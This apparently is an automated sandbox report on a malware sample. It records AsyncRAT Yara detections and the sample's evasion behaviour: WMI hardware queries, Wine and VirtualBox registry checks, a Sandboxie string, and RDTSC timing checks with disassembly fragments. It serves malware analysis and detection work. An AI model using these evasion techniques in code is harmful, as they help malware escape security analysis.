Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 3300, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Macromedia.com, 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 822634 second address: 822638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 835CCB second address: 835CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 835E40 second address: 835E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 835E44 second address: 835E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8360AF second address: 8360B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8360B3 second address: 8360DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3C150B7579h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jp 00007F3C150B7566h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 836399 second address: 8363C1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3C153246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d jnl 00007F3C153246D6h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pushad 0x00000016 jnc 00007F3C153246DEh 0x0000001c pushad 0x0000001d popad 0x0000001e jo 00007F3C153246D6h 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 836538 second address: 83656F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3C150B7566h 0x0000000a jno 00007F3C150B7587h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83656F second address: 83657B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3C153246D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83657B second address: 836580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 836580 second address: 836588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A131 second address: 83A136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A136 second address: 83A15C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F3C153246E9h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A241 second address: 83A26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3C150B7566h 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F3C150B7578h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A26E second address: 83A354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d jnc 00007F3C153246DCh 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push esi 0x00000019 jmp 00007F3C153246E6h 0x0000001e pop esi 0x0000001f pop eax 0x00000020 mov ecx, dword ptr [ebp+122D2A34h] 0x00000026 push 00000003h 0x00000028 add dx, C695h 0x0000002d push 00000000h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F3C153246D8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b stc 0x0000004c push eax 0x0000004d jmp 00007F3C153246E8h 0x00000052 pop esi 0x00000053 push 688C64FDh 0x00000058 pushad 0x00000059 push eax 0x0000005a jno 00007F3C153246D6h 0x00000060 pop eax 0x00000061 jmp 00007F3C153246E8h 0x00000066 popad 0x00000067 add dword ptr [esp], 57739B03h 0x0000006e mov dword ptr [ebp+122D29A1h], ecx 